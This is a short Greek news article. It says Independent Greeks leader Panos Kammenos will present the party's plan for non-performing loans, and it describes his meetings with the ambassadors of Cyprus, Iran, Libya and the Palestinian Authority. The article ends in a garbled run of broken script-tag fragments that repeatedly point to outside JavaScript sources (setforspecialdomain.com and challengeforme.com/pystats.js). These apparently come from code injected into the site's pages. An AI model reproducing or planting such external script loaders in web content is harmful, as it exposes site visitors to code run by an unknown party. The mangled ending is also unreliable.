Ανοίγουν τα χαρτιά τους για τα «κόκκινα δάνεια» οι Ανεξάρτητοι Έλληνες

Ανοίγουν τα χαρτιά τους για τα «κόκκινα δάνεια» οι Ανεξάρτητοι Έλληνες

Τις θέσεις των «Ανεξάρτητων Ελλήνων» για τη διευθέτηση του προβλήματος με τα «κόκκινα δάνεια» θα παρουσιάσει σε συνέντευξη τύπου, στις 12 το μεσημέρι, ο πρόεδρος του κόμματος Πάνος Καμμένος.

Παράλληλα, ο κ. Καμμένος είχε χτες στο γραφείο του στη Βουλή σειρά συναντήσεων με διπλωμάτες άλλων χωρών.
Πρώτα συνάντησε τον πρέσβη της Κύπρου στην Αθήνα Κυριάκο Κενεβέζο και στη συνέχεια τον πρέσβη του Ιράν Μπεχνάμ Μπεχρούζ, τον Πρέσβη της Λιβύης Αχμέντ Γιακόμπ Τζιλάλ και τον πρέσβη της Παλαιστινιακής Αρχής Μαρουάν Εμίλ Τουμπασί.

Σύμφωνα με πηγές του κόμματος συζητήθηκαν διμερή θέματα και οι τρέχουσες διεθνείς εξελίξεις με έμφαση στα γεγονότα της ευρύτερης και εγγύτερης περιοχής μας.

Παρόντες στις συναντήσεις ήταν ο εκπρόσωπος και τομεάρχης Εξωτερικών του Κινήματος, βουλευτής Επικρατείας Τέρενς Κουίκ, ο διπλωματικός σύμβουλος του προέδρου των ΑΝΕΛ πρέσβης Λευτέρης Καραγιάννης και ο διευθυντής του γραφείου του προέδρου στη Βουλή Γιάννης Γιαννέλλης.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >